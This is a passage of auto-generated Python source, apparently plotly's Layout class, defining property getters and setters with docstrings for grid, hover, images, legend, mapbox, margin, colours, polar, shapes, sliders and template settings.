generate defaults using consecutive axis IDs,
in two ways: "coupled" gives one x axis per
column and one y axis per row. "independent"
uses a new xy pair for each cell, left-to-right
across each row then iterating rows according
to `roworder`.
roworder
Is the first row the top or the bottom? Note
that columns are always enumerated from left to
right.
rows
The number of rows in the grid. If you provide
a 2D `subplots` array or a `yaxes` array, its
length is used as the default. But it's also
possible to have a different length, if you
want to leave a row at the end for non-
cartesian subplots.
subplots
Used for freeform grids, where some axes may be
shared across subplots but others are not. Each
entry should be a cartesian subplot id, like
"xy" or "x3y2", or "" to leave that cell empty.
You may reuse x axes within the same column,
and y axes within the same row. Non-cartesian
subplots and traces that support `domain` can
place themselves in this grid separately using
the `gridcell` attribute.
xaxes
Used with `yaxes` when the x and y axes are
shared across columns and rows. Each entry
should be an x axis id like "x", "x2", etc., or
"" to not put an x axis in that column. Entries
other than "" must be unique. Ignored if
`subplots` is present. If missing but `yaxes`
is present, will generate consecutive IDs.
xgap
Horizontal space between grid cells, expressed
as a fraction of the total width available to
one cell. Defaults to 0.1 for coupled-axes
grids and 0.2 for independent grids.
xside
Sets where the x axis labels and titles go.
"bottom" means the very bottom of the grid.
"bottom plot" is the lowest plot that each x
axis is used in. "top" and "top plot" are
similar.
yaxes
Used with `yaxes` when the x and y axes are
shared across columns and rows. Each entry
should be an y axis id like "y", "y2", etc., or
"" to not put a y axis in that row. Entries
other than "" must be unique. Ignored if
`subplots` is present. If missing but `xaxes`
is present, will generate consecutive IDs.
ygap
Vertical space between grid cells, expressed as
a fraction of the total height available to one
cell. Defaults to 0.1 for coupled-axes grids
and 0.3 for independent grids.
yside
Sets where the y axis labels and titles go.
"left" means the very left edge of the grid.
*left plot* is the leftmost plot that each y
axis is used in. "right" and *right plot* are
similar.
Returns
-------
plotly.graph_objs.layout.Grid
"""
return self['grid']
@grid.setter
def grid(self, val):
self['grid'] = val
# height
# ------
@property
def height(self):
"""
Sets the plot's height (in px).
The 'height' property is a number and may be specified as:
- An int or float in the interval [10, inf]
Returns
-------
int|float
"""
return self['height']
@height.setter
def height(self, val):
self['height'] = val
# hiddenlabels
# ------------
@property
def hiddenlabels(self):
"""
The 'hiddenlabels' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self['hiddenlabels']
@hiddenlabels.setter
def hiddenlabels(self, val):
self['hiddenlabels'] = val
# hiddenlabelssrc
# ---------------
@property
def hiddenlabelssrc(self):
"""
Sets the source reference on plot.ly for hiddenlabels .
The 'hiddenlabelssrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self['hiddenlabelssrc']
@hiddenlabelssrc.setter
def hiddenlabelssrc(self, val):
self['hiddenlabelssrc'] = val
# hidesources
# -----------
@property
def hidesources(self):
"""
Determines whether or not a text link citing the data source is
placed at the bottom-right cored of the figure. Has only an
effect only on graphs that have been generated via forked
graphs from the plotly service (at https://plot.ly or on-
premise).
The 'hidesources' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self['hidesources']
@hidesources.setter
def hidesources(self, val):
self['hidesources'] = val
# hoverdistance
# -------------
@property
def hoverdistance(self):
"""
Sets the default distance (in pixels) to look for data to add
hover labels (-1 means no cutoff, 0 means no looking for data).
This is only a real distance for hovering on point-like
objects, like scatter points. For area-like objects (bars,
scatter fills, etc) hovering is on inside the area and off
outside, but these objects will not supersede hover on point-
like objects in case of conflict.
The 'hoverdistance' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [-1, 9223372036854775807]
Returns
-------
int
"""
return self['hoverdistance']
@hoverdistance.setter
def hoverdistance(self, val):
self['hoverdistance'] = val
# hoverlabel
# ----------
@property
def hoverlabel(self):
"""
The 'hoverlabel' property is an instance of Hoverlabel
that may be specified as:
- An instance of plotly.graph_objs.layout.Hoverlabel
- A dict of string/value properties that will be passed
to the Hoverlabel constructor
Supported dict properties:
bgcolor
Sets the background color of all hover labels
on graph
bordercolor
Sets the border color of all hover labels on
graph.
font
Sets the default hover label font used by all
traces on the graph.
namelength
Sets the default length (in number of
characters) of the trace name in the hover
labels for all traces. -1 shows the whole name
regardless of length. 0-3 shows the first 0-3
characters, and an integer >3 will show the
whole name if it is less than that many
characters, but if it is longer, will truncate
to `namelength - 3` characters and add an
ellipsis.
Returns
-------
plotly.graph_objs.layout.Hoverlabel
"""
return self['hoverlabel']
@hoverlabel.setter
def hoverlabel(self, val):
self['hoverlabel'] = val
# hovermode
# ---------
@property
def hovermode(self):
"""
Determines the mode of hover interactions. If `clickmode`
includes the "select" flag, `hovermode` defaults to "closest".
If `clickmode` lacks the "select" flag, it defaults to "x" or
"y" (depending on the trace's `orientation` value) for plots
based on cartesian coordinates. For anything else the default
value is "closest".
The 'hovermode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['x', 'y', 'closest', False]
Returns
-------
Any
"""
return self['hovermode']
@hovermode.setter
def hovermode(self, val):
self['hovermode'] = val
# images
# ------
@property
def images(self):
"""
The 'images' property is a tuple of instances of
Image that may be specified as:
- A list or tuple of instances of plotly.graph_objs.layout.Image
- A list or tuple of dicts of string/value properties that
will be passed to the Image constructor
Supported dict properties:
layer
Specifies whether images are drawn below or
above traces. When `xref` and `yref` are both
set to `paper`, image is drawn below the entire
plot area.
name
When used in a template, named items are
created in the output figure in addition to any
items the figure already has in this array. You
can modify these items in the output figure by
making your own item with `templateitemname`
matching this `name` alongside your
modifications (including `visible: false` or
`enabled: false` to hide it). Has no effect
outside of a template.
opacity
Sets the opacity of the image.
sizex
Sets the image container size horizontally. The
image will be sized based on the `position`
value. When `xref` is set to `paper`, units are
sized relative to the plot width.
sizey
Sets the image container size vertically. The
image will be sized based on the `position`
value. When `yref` is set to `paper`, units are
sized relative to the plot height.
sizing
Specifies which dimension of the image to
constrain.
source
Specifies the URL of the image to be used. The
URL must be accessible from the domain where
the plot code is run, and can be either
relative or absolute.
templateitemname
Used to refer to a named item in this array in
the template. Named items from the template
will be created even without a matching item in
the input figure, but you can modify one by
making an item with `templateitemname` matching
its `name`, alongside your modifications
(including `visible: false` or `enabled: false`
to hide it). If there is no template or no
matching item, this item will be hidden unless
you explicitly show it with `visible: true`.
visible
Determines whether or not this image is
visible.
x
Sets the image's x position. When `xref` is set
to `paper`, units are sized relative to the
plot height. See `xref` for more info
xanchor
Sets the anchor for the x position
xref
Sets the images's x coordinate axis. If set to
a x axis id (e.g. "x" or "x2"), the `x`
position refers to an x data coordinate If set
to "paper", the `x` position refers to the
distance from the left of plot in normalized
coordinates where 0 (1) corresponds to the left
(right).
y
Sets the image's y position. When `yref` is set
to `paper`, units are sized relative to the
plot height. See `yref` for more info
yanchor
Sets the anchor for the y position.
yref
Sets the images's y coordinate axis. If set to
a y axis id (e.g. "y" or "y2"), the `y`
position refers to a y data coordinate. If set
to "paper", the `y` position refers to the
distance from the bottom of the plot in
normalized coordinates where 0 (1) corresponds
to the bottom (top).
Returns
-------
tuple[plotly.graph_objs.layout.Image]
"""
return self['images']
@images.setter
def images(self, val):
self['images'] = val
# imagedefaults
# -------------
@property
def imagedefaults(self):
"""
When used in a template (as
layout.template.layout.imagedefaults), sets the default
property values to use for elements of layout.images
The 'imagedefaults' property is an instance of Image
that may be specified as:
- An instance of plotly.graph_objs.layout.Image
- A dict of string/value properties that will be passed
to the Image constructor
Supported dict properties:
Returns
-------
plotly.graph_objs.layout.Image
"""
return self['imagedefaults']
@imagedefaults.setter
def imagedefaults(self, val):
self['imagedefaults'] = val
# legend
# ------
@property
def legend(self):
"""
The 'legend' property is an instance of Legend
that may be specified as:
- An instance of plotly.graph_objs.layout.Legend
- A dict of string/value properties that will be passed
to the Legend constructor
Supported dict properties:
bgcolor
Sets the legend background color.
bordercolor
Sets the color of the border enclosing the
legend.
borderwidth
Sets the width (in px) of the border enclosing
the legend.
font
Sets the font used to text the legend items.
orientation
Sets the orientation of the legend.
tracegroupgap
Sets the amount of vertical space (in px)
between legend groups.
traceorder
Determines the order at which the legend items
are displayed. If "normal", the items are
displayed top-to-bottom in the same order as
the input data. If "reversed", the items are
displayed in the opposite order as "normal". If
"grouped", the items are displayed in groups
(when a trace `legendgroup` is provided). if
"grouped+reversed", the items are displayed in
the opposite order as "grouped".
x
Sets the x position (in normalized coordinates)
of the legend.
xanchor
Sets the legend's horizontal position anchor.
This anchor binds the `x` position to the
"left", "center" or "right" of the legend.
y
Sets the y position (in normalized coordinates)
of the legend.
yanchor
Sets the legend's vertical position anchor This
anchor binds the `y` position to the "top",
"middle" or "bottom" of the legend.
Returns
-------
plotly.graph_objs.layout.Legend
"""
return self['legend']
@legend.setter
def legend(self, val):
self['legend'] = val
# mapbox
# ------
@property
def mapbox(self):
"""
The 'mapbox' property is an instance of Mapbox
that may be specified as:
- An instance of plotly.graph_objs.layout.Mapbox
- A dict of string/value properties that will be passed
to the Mapbox constructor
Supported dict properties:
accesstoken
Sets the mapbox access token to be used for
this mapbox map. Alternatively, the mapbox
access token can be set in the configuration
options under `mapboxAccessToken`.
bearing
Sets the bearing angle of the map (in degrees
counter-clockwise from North).
center
plotly.graph_objs.layout.mapbox.Center instance
or dict with compatible properties
domain
plotly.graph_objs.layout.mapbox.Domain instance
or dict with compatible properties
layers
plotly.graph_objs.layout.mapbox.Layer instance
or dict with compatible properties
layerdefaults
When used in a template (as
layout.template.layout.mapbox.layerdefaults),
sets the default property values to use for
elements of layout.mapbox.layers
pitch
Sets the pitch angle of the map (in degrees,
where 0 means perpendicular to the surface of
the map).
style
Sets the Mapbox map style. Either input one of
the default Mapbox style names or the URL to a
custom style or a valid Mapbox style JSON.
zoom
Sets the zoom level of the map.
Returns
-------
plotly.graph_objs.layout.Mapbox
"""
return self['mapbox']
@mapbox.setter
def mapbox(self, val):
self['mapbox'] = val
# margin
# ------
@property
def margin(self):
"""
The 'margin' property is an instance of Margin
that may be specified as:
- An instance of plotly.graph_objs.layout.Margin
- A dict of string/value properties that will be passed
to the Margin constructor
Supported dict properties:
autoexpand
b
Sets the bottom margin (in px).
l
Sets the left margin (in px).
pad
Sets the amount of padding (in px) between the
plotting area and the axis lines
r
Sets the right margin (in px).
t
Sets the top margin (in px).
Returns
-------
plotly.graph_objs.layout.Margin
"""
return self['margin']
@margin.setter
def margin(self, val):
self['margin'] = val
# modebar
# -------
@property
def modebar(self):
"""
The 'modebar' property is an instance of Modebar
that may be specified as:
- An instance of plotly.graph_objs.layout.Modebar
- A dict of string/value properties that will be passed
to the Modebar constructor
Supported dict properties:
activecolor
Sets the color of the active or hovered on
icons in the modebar.
bgcolor
Sets the background color of the modebar.
color
Sets the color of the icons in the modebar.
orientation
Sets the orientation of the modebar.
Returns
-------
plotly.graph_objs.layout.Modebar
"""
return self['modebar']
@modebar.setter
def modebar(self, val):
self['modebar'] = val
# orientation
# -----------
@property
def orientation(self):
"""
Legacy polar charts are deprecated! Please switch to "polar"
subplots. Rotates the entire polar by the given angle in legacy
polar charts.
The 'orientation' property is a angle (in degrees) that may be
specified as a number between -180 and 180. Numeric values outside this
range are converted to the equivalent value
(e.g. 270 is converted to -90).
Returns
-------
int|float
"""
return self['orientation']
@orientation.setter
def orientation(self, val):
self['orientation'] = val
# paper_bgcolor
# -------------
@property
def paper_bgcolor(self):
"""
Sets the color of paper where the graph is drawn.
The 'paper_bgcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, saddlebrown, salmon, sandybrown,
seagreen, seashell, sienna, silver, skyblue,
slateblue, slategray, slategrey, snow, springgreen,
steelblue, tan, teal, thistle, tomato, turquoise,
violet, wheat, white, whitesmoke, yellow,
yellowgreen
Returns
-------
str
"""
return self['paper_bgcolor']
@paper_bgcolor.setter
def paper_bgcolor(self, val):
self['paper_bgcolor'] = val
# piecolorway
# -----------
@property
def piecolorway(self):
"""
Sets the default pie slice colors. Defaults to the main
`colorway` used for trace colors. If you specify a new list
here it can still be extended with lighter and darker colors,
see `extendpiecolors`.
The 'piecolorway' property is a colorlist that may be specified
as a tuple, list, one-dimensional numpy array, or pandas Series of valid
color strings
Returns
-------
list
"""
return self['piecolorway']
@piecolorway.setter
def piecolorway(self, val):
self['piecolorway'] = val
# plot_bgcolor
# ------------
@property
def plot_bgcolor(self):
"""
Sets the color of plotting area in-between x and y axes.
The 'plot_bgcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, saddlebrown, salmon, sandybrown,
seagreen, seashell, sienna, silver, skyblue,
slateblue, slategray, slategrey, snow, springgreen,
steelblue, tan, teal, thistle, tomato, turquoise,
violet, wheat, white, whitesmoke, yellow,
yellowgreen
Returns
-------
str
"""
return self['plot_bgcolor']
@plot_bgcolor.setter
def plot_bgcolor(self, val):
self['plot_bgcolor'] = val
# polar
# -----
@property
def polar(self):
"""
The 'polar' property is an instance of Polar
that may be specified as:
- An instance of plotly.graph_objs.layout.Polar
- A dict of string/value properties that will be passed
to the Polar constructor
Supported dict properties:
angularaxis
plotly.graph_objs.layout.polar.AngularAxis
instance or dict with compatible properties
bargap
Sets the gap between bars of adjacent location
coordinates. Values are unitless, they
represent fractions of the minimum difference
in bar positions in the data.
barmode
Determines how bars at the same location
coordinate are displayed on the graph. With
"stack", the bars are stacked on top of one
another With "overlay", the bars are plotted
over one another, you might need to an
"opacity" to see multiple bars.
bgcolor
Set the background color of the subplot
domain
plotly.graph_objs.layout.polar.Domain instance
or dict with compatible properties
gridshape
Determines if the radial axis grid lines and
angular axis line are drawn as "circular"
sectors or as "linear" (polygon) sectors. Has
an effect only when the angular axis has `type`
"category". Note that `radialaxis.angle` is
snapped to the angle of the closest vertex when
`gridshape` is "circular" (so that radial axis
scale is the same as the data scale).
hole
Sets the fraction of the radius to cut out of
the polar subplot.
radialaxis
plotly.graph_objs.layout.polar.RadialAxis
instance or dict with compatible properties
sector
Sets angular span of this polar subplot with
two angles (in degrees). Sector are assumed to
be spanned in the counterclockwise direction
with 0 corresponding to rightmost limit of the
polar subplot.
Returns
-------
plotly.graph_objs.layout.Polar
"""
return self['polar']
@polar.setter
def polar(self, val):
self['polar'] = val
# radialaxis
# ----------
@property
def radialaxis(self):
"""
The 'radialaxis' property is an instance of RadialAxis
that may be specified as:
- An instance of plotly.graph_objs.layout.RadialAxis
- A dict of string/value properties that will be passed
to the RadialAxis constructor
Supported dict properties:
domain
Polar chart subplots are not supported yet.
This key has currently no effect.
endpadding
Legacy polar charts are deprecated! Please
switch to "polar" subplots.
orientation
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the
orientation (an angle with respect to the
origin) of the radial axis.
range
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Defines the start
and end point of this radial axis.
showline
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Determines whether
or not the line bounding this radial axis will
be shown on the figure.
showticklabels
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Determines whether
or not the radial axis ticks will feature tick
labels.
tickcolor
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the color of
the tick lines on this radial axis.
ticklen
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the length of
the tick lines on this radial axis.
tickorientation
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the
orientation (from the paper perspective) of the
radial axis tick labels.
ticksuffix
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Sets the length of
the tick lines on this radial axis.
visible
Legacy polar charts are deprecated! Please
switch to "polar" subplots. Determines whether
or not this axis will be visible.
Returns
-------
plotly.graph_objs.layout.RadialAxis
"""
return self['radialaxis']
@radialaxis.setter
def radialaxis(self, val):
self['radialaxis'] = val
# scene
# -----
@property
def scene(self):
"""
The 'scene' property is an instance of Scene
that may be specified as:
- An instance of plotly.graph_objs.layout.Scene
- A dict of string/value properties that will be passed
to the Scene constructor
Supported dict properties:
annotations
plotly.graph_objs.layout.scene.Annotation
instance or dict with compatible properties
annotationdefaults
When used in a template (as layout.template.lay
out.scene.annotationdefaults), sets the default
property values to use for elements of
layout.scene.annotations
aspectmode
If "cube", this scene's axes are drawn as a
cube, regardless of the axes' ranges. If
"data", this scene's axes are drawn in
proportion with the axes' ranges. If "manual",
this scene's axes are drawn in proportion with
the input of "aspectratio" (the default
behavior if "aspectratio" is provided). If
"auto", this scene's axes are drawn using the
results of "data" except when one axis is more
than four times the size of the two others,
where in that case the results of "cube" are
used.
aspectratio
Sets this scene's axis aspectratio.
bgcolor
camera
plotly.graph_objs.layout.scene.Camera instance
or dict with compatible properties
domain
plotly.graph_objs.layout.scene.Domain instance
or dict with compatible properties
dragmode
Determines the mode of drag interactions for
this scene.
hovermode
Determines the mode of hover interactions for
this scene.
xaxis
plotly.graph_objs.layout.scene.XAxis instance
or dict with compatible properties
yaxis
plotly.graph_objs.layout.scene.YAxis instance
or dict with compatible properties
zaxis
plotly.graph_objs.layout.scene.ZAxis instance
or dict with compatible properties
Returns
-------
plotly.graph_objs.layout.Scene
"""
return self['scene']
@scene.setter
def scene(self, val):
self['scene'] = val
# selectdirection
# ---------------
@property
def selectdirection(self):
"""
When "dragmode" is set to "select", this limits the selection
of the drag to horizontal, vertical or diagonal. "h" only
allows horizontal selection, "v" only vertical, "d" only
diagonal and "any" sets no limit.
The 'selectdirection' property is an enumeration that may be specified as:
- One of the following enumeration values:
['h', 'v', 'd', 'any']
Returns
-------
Any
"""
return self['selectdirection']
@selectdirection.setter
def selectdirection(self, val):
self['selectdirection'] = val
# separators
# ----------
@property
def separators(self):
"""
Sets the decimal and thousand separators. For example, *. *
puts a '.' before decimals and a space between thousands. In
English locales, dflt is ".," but other locales may alter this
default.
The 'separators' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self['separators']
@separators.setter
def separators(self, val):
self['separators'] = val
# shapes
# ------
@property
def shapes(self):
"""
The 'shapes' property is a tuple of instances of
Shape that may be specified as:
- A list or tuple of instances of plotly.graph_objs.layout.Shape
- A list or tuple of dicts of string/value properties that
will be passed to the Shape constructor
Supported dict properties:
fillcolor
Sets the color filling the shape's interior.
layer
Specifies whether shapes are drawn below or
above traces.
line
plotly.graph_objs.layout.shape.Line instance or
dict with compatible properties
name
When used in a template, named items are
created in the output figure in addition to any
items the figure already has in this array. You
can modify these items in the output figure by
making your own item with `templateitemname`
matching this `name` alongside your
modifications (including `visible: false` or
`enabled: false` to hide it). Has no effect
outside of a template.
opacity
Sets the opacity of the shape.
path
For `type` "path" - a valid SVG path with the
pixel values replaced by data values in
`xsizemode`/`ysizemode` being "scaled" and
taken unmodified as pixels relative to
`xanchor` and `yanchor` in case of "pixel" size
mode. There are a few restrictions / quirks
only absolute instructions, not relative. So
the allowed segments are: M, L, H, V, Q, C, T,
S, and Z arcs (A) are not allowed because
radius rx and ry are relative. In the future we
could consider supporting relative commands,
but we would have to decide on how to handle
date and log axes. Note that even as is, Q and
C Bezier paths that are smooth on linear axes
may not be smooth on log, and vice versa. no
chained "polybezier" commands - specify the
segment type for each one. On category axes,
values are numbers scaled to the serial numbers
of categories because using the categories
themselves there would be no way to describe
fractional positions On data axes: because
space and T are both normal components of path
strings, we can't use either to separate date
from time parts. Therefore we'll use underscore
for this purpose: 2015-02-21_13:45:56.789
templateitemname
Used to refer to a named item in this array in
the template. Named items from the template
will be created even without a matching item in
the input figure, but you can modify one by
making an item with `templateitemname` matching
its `name`, alongside your modifications
(including `visible: false` or `enabled: false`
to hide it). If there is no template or no
matching item, this item will be hidden unless
you explicitly show it with `visible: true`.
type
Specifies the shape type to be drawn. If
"line", a line is drawn from (`x0`,`y0`) to
(`x1`,`y1`) with respect to the axes' sizing
mode. If "circle", a circle is drawn from
((`x0`+`x1`)/2, (`y0`+`y1`)/2)) with radius
(|(`x0`+`x1`)/2 - `x0`|, |(`y0`+`y1`)/2
-`y0`)|) with respect to the axes' sizing mode.
If "rect", a rectangle is drawn linking
(`x0`,`y0`), (`x1`,`y0`), (`x1`,`y1`),
(`x0`,`y1`), (`x0`,`y0`) with respect to the
axes' sizing mode. If "path", draw a custom SVG
path using `path`. with respect to the axes'
sizing mode.
visible
Determines whether or not this shape is
visible.
x0
Sets the shape's starting x position. See
`type` and `xsizemode` for more info.
x1
Sets the shape's end x position. See `type` and
`xsizemode` for more info.
xanchor
Only relevant in conjunction with `xsizemode`
set to "pixel". Specifies the anchor point on
the x axis to which `x0`, `x1` and x
coordinates within `path` are relative to. E.g.
useful to attach a pixel sized shape to a
certain data value. No effect when `xsizemode`
not set to "pixel".
xref
Sets the shape's x coordinate axis. If set to
an x axis id (e.g. "x" or "x2"), the `x`
position refers to an x coordinate. If set to
"paper", the `x` position refers to the
distance from the left side of the plotting
area in normalized coordinates where 0 (1)
corresponds to the left (right) side. If the
axis `type` is "log", then you must take the
log of your desired range. If the axis `type`
is "date", then you must convert the date to
unix time in milliseconds.
xsizemode
Sets the shapes's sizing mode along the x axis.
If set to "scaled", `x0`, `x1` and x
coordinates within `path` refer to data values
on the x axis or a fraction of the plot area's
width (`xref` set to "paper"). If set to
"pixel", `xanchor` specifies the x position in
terms of data or plot fraction but `x0`, `x1`
and x coordinates within `path` are pixels
relative to `xanchor`. This way, the shape can
have a fixed width while maintaining a position
relative to data or plot fraction.
y0
Sets the shape's starting y position. See
`type` and `ysizemode` for more info.
y1
Sets the shape's end y position. See `type` and
`ysizemode` for more info.
yanchor
Only relevant in conjunction with `ysizemode`
set to "pixel". Specifies the anchor point on
the y axis to which `y0`, `y1` and y
coordinates within `path` are relative to. E.g.
useful to attach a pixel sized shape to a
certain data value. No effect when `ysizemode`
not set to "pixel".
yref
Sets the annotation's y coordinate axis. If set
to an y axis id (e.g. "y" or "y2"), the `y`
position refers to an y coordinate If set to
"paper", the `y` position refers to the
distance from the bottom of the plotting area
in normalized coordinates where 0 (1)
corresponds to the bottom (top).
ysizemode
Sets the shapes's sizing mode along the y axis.
If set to "scaled", `y0`, `y1` and y
coordinates within `path` refer to data values
on the y axis or a fraction of the plot area's
height (`yref` set to "paper"). If set to
"pixel", `yanchor` specifies the y position in
terms of data or plot fraction but `y0`, `y1`
and y coordinates within `path` are pixels
relative to `yanchor`. This way, the shape can
have a fixed height while maintaining a
position relative to data or plot fraction.
Returns
-------
tuple[plotly.graph_objs.layout.Shape]
"""
return self['shapes']
@shapes.setter
def shapes(self, val):
self['shapes'] = val
# shapedefaults
# -------------
@property
def shapedefaults(self):
"""
When used in a template (as
layout.template.layout.shapedefaults), sets the default
property values to use for elements of layout.shapes
The 'shapedefaults' property is an instance of Shape
that may be specified as:
- An instance of plotly.graph_objs.layout.Shape
- A dict of string/value properties that will be passed
to the Shape constructor
Supported dict properties:
Returns
-------
plotly.graph_objs.layout.Shape
"""
return self['shapedefaults']
@shapedefaults.setter
def shapedefaults(self, val):
self['shapedefaults'] = val
# showlegend
# ----------
@property
def showlegend(self):
"""
Determines whether or not a legend is drawn. Default is `true`
if there is a trace to show and any of these: a) Two or more
traces would by default be shown in the legend. b) One pie
trace is shown in the legend. c) One trace is explicitly given
with `showlegend: true`.
The 'showlegend' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self['showlegend']
@showlegend.setter
def showlegend(self, val):
self['showlegend'] = val
# sliders
# -------
@property
def sliders(self):
"""
The 'sliders' property is a tuple of instances of
Slider that may be specified as:
- A list or tuple of instances of plotly.graph_objs.layout.Slider
- A list or tuple of dicts of string/value properties that
will be passed to the Slider constructor
Supported dict properties:
active
Determines which button (by index starting from
0) is considered active.
activebgcolor
Sets the background color of the slider grip
while dragging.
bgcolor
Sets the background color of the slider.
bordercolor
Sets the color of the border enclosing the
slider.
borderwidth
Sets the width (in px) of the border enclosing
the slider.
currentvalue
plotly.graph_objs.layout.slider.Currentvalue
instance or dict with compatible properties
font
Sets the font of the slider step labels.
len
Sets the length of the slider This measure
excludes the padding of both ends. That is, the
slider's length is this length minus the
padding on both ends.
lenmode
Determines whether this slider length is set in
units of plot "fraction" or in *pixels. Use
`len` to set the value.
minorticklen
Sets the length in pixels of minor step tick
marks
name
When used in a template, named items are
created in the output figure in addition to any
items the figure already has in this array. You
can modify these items in the output figure by
making your own item with `templateitemname`
matching this `name` alongside your
modifications (including `visible: false` or
`enabled: false` to hide it). Has no effect
outside of a template.
pad
Set the padding of the slider component along
each side.
steps
plotly.graph_objs.layout.slider.Step instance
or dict with compatible properties
stepdefaults
When used in a template (as
layout.template.layout.slider.stepdefaults),
sets the default property values to use for
elements of layout.slider.steps
templateitemname
Used to refer to a named item in this array in
the template. Named items from the template
will be created even without a matching item in
the input figure, but you can modify one by
making an item with `templateitemname` matching
its `name`, alongside your modifications
(including `visible: false` or `enabled: false`
to hide it). If there is no template or no
matching item, this item will be hidden unless
you explicitly show it with `visible: true`.
tickcolor
Sets the color of the border enclosing the
slider.
ticklen
Sets the length in pixels of step tick marks
tickwidth
Sets the tick width (in px).
transition
plotly.graph_objs.layout.slider.Transition
instance or dict with compatible properties
visible
Determines whether or not the slider is
visible.
x
Sets the x position (in normalized coordinates)
of the slider.
xanchor
Sets the slider's horizontal position anchor.
This anchor binds the `x` position to the
"left", "center" or "right" of the range
selector.
y
Sets the y position (in normalized coordinates)
of the slider.
yanchor
Sets the slider's vertical position anchor This
anchor binds the `y` position to the "top",
"middle" or "bottom" of the range selector.
Returns
-------
tuple[plotly.graph_objs.layout.Slider]
"""
return self['sliders']
@sliders.setter
def sliders(self, val):
self['sliders'] = val
# sliderdefaults
# --------------
@property
def sliderdefaults(self):
"""
When used in a template (as
layout.template.layout.sliderdefaults), sets the default
property values to use for elements of layout.sliders
The 'sliderdefaults' property is an instance of Slider
that may be specified as:
- An instance of plotly.graph_objs.layout.Slider
- A dict of string/value properties that will be passed
to the Slider constructor
Supported dict properties:
Returns
-------
plotly.graph_objs.layout.Slider
"""
return self['sliderdefaults']
@sliderdefaults.setter
def sliderdefaults(self, val):
self['sliderdefaults'] = val
# spikedistance
# -------------
@property
def spikedistance(self):
"""
Sets the default distance (in pixels) to look for data to draw
spikelines to (-1 means no cutoff, 0 means no looking for
data). As with hoverdistance, distance does not apply to area-
like objects. In addition, some objects can be hovered on but
will not generate spikelines, such as scatter fills.
The 'spikedistance' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [-1, 9223372036854775807]
Returns
-------
int
"""
return self['spikedistance']
@spikedistance.setter
def spikedistance(self, val):
self['spikedistance'] = val
# template
# --------
@property
def template(self):
"""
Default attributes to be applied to the plot. This should be a
dict with format: `{'layout': layoutTemplate, 'data':
{trace_type: [traceTemplate, ...], ...}}` where
`layoutTemplate` is a dict matching the structure of
`figure.layout` and `traceTemplate` is a dict matching the
structure of the trace with type `trace_type` (e.g. 'scatter').
